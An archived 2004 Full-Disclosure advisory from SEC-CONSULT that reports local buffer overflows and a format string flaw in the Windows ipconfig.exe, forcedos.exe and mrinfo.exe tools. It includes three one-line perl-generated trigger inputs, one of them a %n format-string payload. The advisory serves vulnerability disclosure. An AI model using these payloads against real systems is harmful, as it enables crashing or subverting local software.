lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20041117090236.036773c2.m.eiszner@sec-consult.com>
From: m.eiszner at sec-consult.com (Martin Eiszner)
Subject: Microsoft Windows cmd line tools BOFs

========================================
Microsoft commandline tools BOF s
========================================

Product:        Windows-2000 SP4 / Windows-XP SP2

Vulnerablities:

- Buffer Overflow (no privilege escalation)

Vendor:         Microsoft (http://www.microsoft.com/)
Vendor-Status:  vendor contacted (between 2002 and 2003)
Vendor-Patches: ipconfig (XP-SP 2) / forcedos.exe and mrinfo.exe not available

Objects:        ipconfig.exe / forcedos.exe / mrinfo.exe

Exploitable:
Local:          PARTIAL
Remote:         NO

============
Introduction
============

---

=====================
Vulnerability Details
=====================

1) LOCAL BUFFER OVERFLOWS / FORMAT STRING VULNERABILITY
=======================================================

OBJECTS:
ipconfig.exe (only Windows-2000 SP4)
forcedos.exe
mrinfo.exe

DESCRIPTION:
Insufficient input-validation leads to a) stack based bufferoverflows and b) format string- vulnerabilites.

EXAMPLES:

a) ipconfig.exe /`perl -e 'print "PAAAA\x44\x33\x22\x11","%08x"x13,"%n";'`
b) forcedos.exe `perl -e 'print "A"x6784;'`
c) mrinfo.exe -i `perl -e 'print "A"x60;'`

===============
GENERAL REMARKS
===============

Find related postings regarding this issue here: (http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2004-10/0065.html).

It is unlikely you to gain access or elevate priviledges thru "forcedos.exe" and "mrinfo.exe".

Nevertheless it might be possible to misuse "ipconfig.exe" in an "restricted" environment with DHCP enabled !!


====================
Recommended Hotfixes
====================

---

EOF @2003 Brereton_paul@...nternet.com,m.eiszner@...-consult.com


=======
Contact
=======

SEC-CONSULT
UK / EUROPE
Austria / EUROPE

Brereton_paul@...nternet.com
m.eiszner@...-consult.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ